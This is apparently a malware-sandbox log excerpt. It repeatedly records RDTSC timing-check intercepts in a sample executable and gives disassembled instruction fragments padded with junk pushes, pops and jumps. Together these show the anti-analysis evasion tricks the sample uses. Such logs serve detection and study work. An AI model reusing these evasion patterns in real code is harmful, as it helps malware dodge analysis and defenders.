Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 378331 second address: 378336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37878F second address: 3787AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 378923 second address: 37892E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37892E second address: 378991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007F3A9502B5F4h 0x00000010 pushad 0x00000011 jmp 00007F3A9502B5EEh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c jg 00007F3A9502B602h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 jl 00007F3A9502B5E6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 378991 second address: 3789DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A94CD4089h 0x0000000b popad 0x0000000c pop eax 0x0000000d mov ecx, 6DD6FF35h 0x00000012 push D0022165h 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F3A94CD408Eh 0x0000001f jmp 00007F3A94CD4088h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3789DC second address: 3789E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F3A9502B5E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 378ADF second address: 378AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 378E29 second address: 378E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F3A9502B5E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 379192 second address: 37919D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3A94CD4076h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37919D second address: 3791B0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A9502B5E8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3791B0 second address: 3791B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3791B4 second address: 3791D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3791D1 second address: 3791D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3791D7 second address: 3791DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37959D second address: 360F8A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3A94CD4078h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007F3A94CD407Ah 0x00000011 nop 0x00000012 mov cx, si 0x00000015 call dword ptr [ebp+122D192Fh] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jo 00007F3A94CD4076h 0x00000024 jo 00007F3A94CD4076h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C000B second address: 3C000F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C000F second address: 3C0019 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3A94CD4076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0019 second address: 3C0022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0022 second address: 3C0040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3A94CD4080h 0x0000000b popad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0040 second address: 3C0046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0046 second address: 3C005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 jng 00007F3A94CD40A9h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jc 00007F3A94CD4076h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C005F second address: 3C0068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0068 second address: 3C006E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C01B8 second address: 3C01BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C030E second address: 3C031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007F3A94CD4076h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C031C second address: 3C0325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0325 second address: 3C032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C032B second address: 3C0348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A9502B5F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0348 second address: 3C034C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2F93 second address: 3C2FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A9502B5F1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F3A9502B5E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2FB5 second address: 3C2FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2FB9 second address: 3C2FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2B1F second address: 3C2B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2B23 second address: 3C2B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F3A9502B5F2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2B41 second address: 3C2B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3A94CD4076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2B4B second address: 3C2B5C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3A9502B5ECh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C5A8C second address: 3C5A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C5A90 second address: 3C5AD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3A9502B5F2h 0x0000000c jp 00007F3A9502B5E6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 jns 00007F3A9502B5F9h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C5AD2 second address: 3C5AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4088h 0x00000007 jmp 00007F3A94CD407Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3CCA32 second address: 3CCA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3CCA36 second address: 3CCAA5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3A94CD407Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F3A94CD408Ah 0x00000011 jmp 00007F3A94CD407Ah 0x00000016 jmp 00007F3A94CD407Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3A94CD4088h 0x00000023 pushad 0x00000024 jns 00007F3A94CD4076h 0x0000002a jmp 00007F3A94CD4080h 0x0000002f jmp 00007F3A94CD407Fh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37900A second address: 379031 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F3A9502B5E6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F3A9502B5F6h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D033A second address: 3D0340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D0340 second address: 3D0344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D0344 second address: 3D0377 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A94CD4089h 0x0000000d jmp 00007F3A94CD4082h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D0377 second address: 3D037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D04D2 second address: 3D04FA instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A94CD4076h 0x00000008 jmp 00007F3A94CD4086h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F3A94CD4078h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D04FA second address: 3D053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F5h 0x00000007 jmp 00007F3A9502B5EFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jno 00007F3A9502B602h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 jg 00007F3A9502B5E6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D3DCC second address: 3D3DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D3DD0 second address: 3D3DDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D3DDF second address: 3D3E1B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A94CD408Eh 0x00000008 jmp 00007F3A94CD4085h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D405E second address: 3D4078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A9502B5F0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D4078 second address: 3D407C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DB0AE second address: 3DB0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F3A9502B5ECh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DB785 second address: 3DB78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DBD01 second address: 3DBD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DC00A second address: 3DC018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F3A94CD4076h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DC2F2 second address: 3DC308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DC5F8 second address: 3DC616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A94CD4089h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DCC0B second address: 3DCC0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DCC0F second address: 3DCC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DCC17 second address: 3DCC2B instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A9502B5EEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a jns 00007F3A9502B5E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E01B2 second address: 3E01DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jg 00007F3A94CD407Ch 0x0000000d jne 00007F3A94CD4076h 0x00000013 jnc 00007F3A94CD4078h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jng 00007F3A94CD4076h 0x00000024 jns 00007F3A94CD4076h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E01DE second address: 3E01F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F3A9502B5F0h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E04BF second address: 3E04C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E04C5 second address: 3E04EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3A9502B5E6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jne 00007F3A9502B5F3h 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F3A9502B5E6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E04EF second address: 3E0503 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F3A94CD4076h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E07A3 second address: 3E07A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E07A7 second address: 3E07C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F3A94CD4080h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E08F2 second address: 3E0912 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3A9502B5EEh 0x00000011 jno 00007F3A9502B5E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E0912 second address: 3E0935 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 jmp 00007F3A94CD4083h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E0935 second address: 3E093E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E0A7D second address: 3E0A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3ED888 second address: 3ED892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EBB83 second address: 3EBB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EBB87 second address: 3EBB8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EBB8D second address: 3EBB9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3A94CD407Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EBE41 second address: 3EBE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EBE47 second address: 3EBE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3A94CD4085h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EBE61 second address: 3EBE66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC15C second address: 3EC178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4080h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC178 second address: 3EC17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC17C second address: 3EC180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC4A7 second address: 3EC4B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC4B1 second address: 3EC4B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC4B5 second address: 3EC4B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC607 second address: 3EC615 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC615 second address: 3EC619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 332D00 second address: 332D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3A94CD4076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 332D0A second address: 332D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3ECF25 second address: 3ECF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
